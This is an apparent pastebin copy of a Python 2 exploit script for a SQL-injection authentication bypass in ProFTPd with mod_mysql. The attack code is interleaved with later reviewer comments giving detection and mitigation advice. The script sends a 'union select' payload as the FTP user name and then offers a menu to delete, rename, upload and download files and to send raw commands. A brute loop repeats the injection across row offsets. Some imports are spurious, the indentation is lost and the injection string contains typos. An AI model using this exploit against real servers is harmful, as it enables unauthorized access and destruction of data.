
Untitled

a guest
Jun 8th, 2017
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3.  
  4. ## --------------------------------------------------------------------
  5. ## ProFTPd with mod_mysql Authentication Bypass Exploit [PYTHON]
  6. ## Code By NqrK
  7. ## Powered By Python 2.6
  8. ##
  9. ##
  10. ## --------------------------------------------------------------------
  11. ## Class : Input Validation Error
  12. ## Remote: Yes
  13. ## Credit:
  14. ## Page :
  15. ##
  16. ##
  17. ##
  18. ## --------------------------------------------------------------------
  19. ## ProFTPd with mod_mysql is prone to an SQL-injection issue because it fails
  20. ## to sufficiently sanitize user-supplied data before using it in an SQL query.
  21. ## A successful injection could allow an attacker to
  22. ## modify data, or exploit latent vulnerabilities in the underlying database.
  23. ## This may result in unauthorized access and a compromise of the application;
  24. ## other attacks are also possible.
  25. ## --------------------------------------------------------------------
  26.  
  27.  
  28.  
  29. import os
  30. import sys
  31. import ftplib
  32. from ftplib import FTP
  33. from Xlib.protocol.structs import Host
  34. from __builtin__ import raw_input
  35. from twisted.protocols import ftp
  36.  
  37. try:
      # Cosmetic console setup only; nothing in this statement touches the target.
  38. os.system('color 0a')  # `color` is a cmd.exe built-in (console colours)
  39. os.system('title ProFTPd with mod_mysql Authetication Bypass Exploit')  # `title` is a cmd.exe built-in (window title)
  40.  
  41. except:
      # NOTE(review): os.system() reports a failed command through its return value, not an
      # exception, so this branch is not expected to run on a non-Windows host. The two
      # messages are banner text: no "Unix_Kernel" module is imported or defined in this listing.
  42. print("[!]You are in Unix, Change of exploit... [ok].")
  43. print("[+]Run modules Unix_Kernel..[RUN].\n")
  44.  
  45.  
  46. def Core():
  47. """
  48. Post-login menu loop: read a choice and issue the matching FTP command.

      Called from the module-level flow further down, after its login call has
      returned. It relies on the module-level names ``ftp`` (the ftplib.FTP
      session) and ``Host`` (the target string typed by the operator); both are
      rebound there, replacing the Xlib and twisted names imported under the
      same spelling at the top of the file.

      NOTE(review): indentation was lost when this paste was captured, so the
      nesting of the branches below is inferred from statement order.

      Defender's view: everything in this function is ordinary authenticated
      FTP traffic. The server's command/transfer log is therefore the record of
      what was done after the bypass: LIST, DELE, RNFR/RNTO, MKD, STOR, CWD and
      whatever raw text was typed under option 5.
  49. """
  50. print("\n\t[!]Please Choose a Command To Execut On ", Host, "\n")
  51. print("[1] Show Files.")
  52. print("[2] Delete Files.")
  53. print("[3] Rename Files or Dir")
  54. print("[4] Create Directory")
  55. print("[5] Personnal Command")
  56. print("[6] Download Files")
  57. print("[7] Upload Files")
  58. print("[8] Change Directory")
  59. print("[9] Clear Console")
  60. print("[0] Show Menu")
  61. print("[E] Exit\n")
  62.  
  63. while (1):
  64. cmd = raw_input("root@cmd ~ #")
  65. if cmd == "1":
  66. print("[!]Listing File On Server : ", Host, "...\n")
  67. try:
  68. ftp.retrlines('LIST')  # LIST on the control channel, listing returned over a data connection
  69. print("[+]Listing File On", Host, "is SuccessFul !\n")
  70.  
  71. except:  # bare except (here and in every branch below): the ftplib error and the server's reply text are discarded
  72. print("[!] Cannot Listing File On", Host, "\n\a")
  73. elif cmd == "2":
  74. print("[!] Please Specify a File To Delete\n")
  75. try:
  76. File = raw_input("Remove File : ")
  77. ftp.delete(File)  # DELE <name>
  78. print("[+]File {", File, "} Deleted ! \n")
  79. except:
  80. print("[!] Cannot Deleting File On", Host, "\n\a")
  81. elif cmd == "3":
  82. print("[!] Please Speecify a File To Rename\n")
  83. try:
  84. File = raw_input("Rename File : ")
  85. Rename = raw_input("New Name : ")
  86. ftp.rename(File, Rename)  # RNFR <old> followed by RNTO <new>
  87. print("[+]File {", File, "} Renamed to {", Rename, "} \n")
  88. except:
  89. print("[!] Cannot Renamed File On", Host, "\n\a")
  90. elif cmd == "4":
  91. print("[!] Please Specify a Directory Name To create\n")
  92. try:
  93. DIR = raw_input("New Directory : ")
  94. ftp.mkd(DIR)  # MKD <name>
  95. print("[+]Create a New Directory !\n")
  96. except:
  97. print("[!] Cannot Created DIR On", Host, "\n\a")
  98. elif cmd == "5":
  99. print("[!] Please Enter you Command :")
  100. print("[!] Enter ''/close'' for Exit Option\n")
  101. while (1):
  102. perso_cmd = raw_input("root@server ~ # ")
  103. if perso_cmd == "/close":
  104. break
  105. else:
  106. try:
  107. request = ftp.sendcmd(perso_cmd)  # operator-typed text is sent verbatim as one control-channel command
  108. print(request)
  109. except:
  110. print("[!]Command not Found On ", Host, "\n\a")
  111. elif cmd == "6":
  112. print("[!] Please Specify a Files Name To Download\n")
  113. Rem_Files = raw_input("Download Files : ")
  114. try:
  115. ftp.sendcmd('GET '+ Rem_Files)  # sends the literal text "GET <name>" on the control channel; GET is an FTP client's command name rather than a protocol verb, so this line in a server log is a distinctive trace of this script
  116. print("[+]File {", Rem_Files, "} Downloaded !\n")
  117. except:
  118. print("[!] Cannot Download Files On ", Host, "\n\a")
  119. elif cmd == "7":
  120. print("[!] Please Specify a Files Name To Upload\n")
  121. try:
  122. File = raw_input("Files : ")
  123. upl = open(File, 'rb')
  124. ftp.storbinary('STOR '+File, upl)  # STOR: the local path typed above is also used as the remote name
  125. upl.close()
  126. print("[+]File {", File,"} Uploaded !\n")
  127. except:
  128. print("[!] Cannot Upload Files On ", Host, "\n\a")
  129. elif cmd == "8":
  130. print("[!] Please Specify a Directory Name To Changed\n")
  131. try:
  132. Dir = raw_input("Directory : ")
  133. ftp.sendcmd('CWD '+ Dir)  # CWD <dir>
  134. print("[+]Directory : ", Dir, "\n")
  135. except:
  136. print("[!] Cannot Changed Directory On ", Host, "\n\a")
  137. elif cmd == "9":
  138. try:
  139. os.system('cls')  # NOTE(review): os.system() does not raise when `cls` is unavailable, so the `clear` fallback is not expected to run
  140. except:
  141. os.system('clear')
  142. elif cmd == "0":
  143. print("\n\t[!]Please Choose a Chommand To Execut On ", Host, "\n")
  144. print("[1] Show Files.")
  145. print("[2] Delete Files.")
  146. print("[3] Rename Files or Dir")
  147. print("[4] Create Files or Dir")
  148. print("[5] Personnal Command")
  149. print("[6] Download Files")
  150. print("[7] Upload Files")
  151. print("[8] Change Directory")
  152. print("[9] Clear Console")
  153. print("[0] Show Menu")
  154. print("[E] Exit\n")
  155.  
  156. elif cmd == "E":
  157. ftp.quit()  # QUIT: closes the control connection
  158. print("[!]Disconnection.....[ok].\a")
  159. print("[+]Unloading exploit....[ok].\a")
  160. print("Exit...[OUT].\a\n")
  161.  
  162. raw_input("Press ENTER To Continue...")
  163.  
  164.  
  165. break
  166.  
  167. def Brute():
       # Fallback offered by the module-level flow when its single login attempt fails.
       # Prompts for a target, then the nested brute() makes 31 login attempts (i = 0..30);
       # each uses password "1" and a user name carrying an SQL fragment that differs only
       # in the number appended from the loop counter.
       #
       # NOTE(review): indentation was lost in this paste; nesting is inferred from order.
       #
       # Defender's view: every attempt opens a new control connection and sends a USER
       # argument containing a quote, `union select` and a `--` comment marker. No legitimate
       # account name looks like that, so FTP auth logs and network sensors can alert on
       # those substrings, and a burst of about 31 such logins from one source is a clear
       # indicator. The durable fix is on the server: the header of this file attributes the
       # issue to user-supplied data not being sanitized before it reaches an SQL query, so
       # run a ProFTPD build in which that is corrected (fixed release: see the vendor
       # advisory) and cap failed logins per connection and per source.
  168. print("\n\t=================================================")
  169. print("\t [+] Attempting User Directory Discover Via FTP")
  170. print("\t=================================================\n")
  171. go = raw_input("[*] Target Online : ")
  172. print("\n")
  173. def brute():
  174. for i in range(0, 31):
  175. try:
  176. username = "%') and 1 = 2 union select 1, 1uid, gid, homedir, shell from ftpuser LINIT "+str(i) +",1; --"
  177. password = str("1")
  178. ftp = FTP(go)  # local name: a separate session per attempt, not the module-level `ftp`
  179. ftp.login(username, password)
  180. print("\n\a\t[+] Logged in as user "+ str(i) +",1")
  181. ftp.retrlines('LIST')
  182. ftp.close()
  183. except:  # bare except: a refused connection and a rejected login are reported identically
  184. print("[!] Invalid USER ["+str(i)+"] number On ", go, "....Auto-Restart BruteForcer.")
  185.  
  186. brute()
  187. print("\n[$] Brute-Force Finished..\n")
  188. raw_input()
  189. print("")
       # Module-level flow: print a banner, ask for a target, connect, and make one login
       # attempt whose user name carries an SQL fragment. If login() returns, Core() is
       # started; if it raises, the operator is offered Brute().
       #
       # NOTE(review): indentation was lost in this paste; the try/except nesting below is
       # inferred from statement order.
       #
       # Defender's view: the password is a throwaway "1"; the only interesting input is the
       # USER value. Per the header of this file, the server uses that value in an SQL query
       # without sufficient sanitising, so the injected clause rather than a credential check
       # decides the outcome. Detection: alert on FTP USER arguments containing a quote,
       # `union select` or `--`. Mitigation: run a ProFTPD build in which the user name is
       # escaped before it reaches the SQL backend (fixed release: see the vendor advisory),
       # and give the FTP service's database account read-only access to the users table.
  190. print("\t=========================================================")
  191. print("\t[+] ProFTPd with mod_mysql Authentication Bypass Exploit")
  192. print("\t[+] Credits Go For NqrK For Finding The Bug !")
  193. print("\t [+]Exploited By NqrK")
  194. print("\t [+]Forum.pr0ceed.net")
  195. print("\t=========================================================\n\a")
  196. user = "%') and 1=2 union select 1, 1uid, gid, homedir, shell from ftpuser, --"
  197. passwd = "1"
  198. Host = raw_input(" [*]Target: ")  # rebinds the `Host` name imported from Xlib at the top of the file
  199. print("\n\a [!] Attacking ", Host, "...\n")
  200. try:
  201. print("[+]Conneect to host [waiting please]...\n\a")
  202. ftp = FTP(Host)  # rebinds the `ftp` name imported from twisted; Core() uses this session
  203. print("[+]Connected to ", Host, "\n\a")
  204. try:
  205. print("[+]loading exploit...Attacking..[Waiting Please]. \n")
  206. ftp.login(user, passwd)
  207. try:
  208. print("[+]Attacking succeessful !\n\a")
  209. print("[+]Exploit PWNED The Machine : ", Host, " Enter in Matrix...\a\n")
  210. Core()
  211. sys.exit()  # raises SystemExit, which the bare except on the next line also catches (nesting inferred; TODO confirm)
  212. except:
  213. print("[!]END ProFTPd with mod_mysql Authentication Bypass Exploit in Python 3.5 By NqrK\n\a")  # message says 3.5; the header says Python 2.6 and the code uses raw_input/__builtin__
  214. except:
  215. print("[!] Couldn't ByPass The authentication !\a\n")
  216. print("\n[+] Attempting User Directory Discover Via FTP [+]\n ")
  217. choice = raw_input("(yes)/(no): ")
  218. if choice == "yes":
  219. Brute()
  220. else:
  221. pass
  222.  
  223.  
  224.  
  225. except:
  226.  
  227.  
  228. print("[!] Cannot connect to ", Host, "\n\a")
  229. raw_input()
  230.  
  231. ##END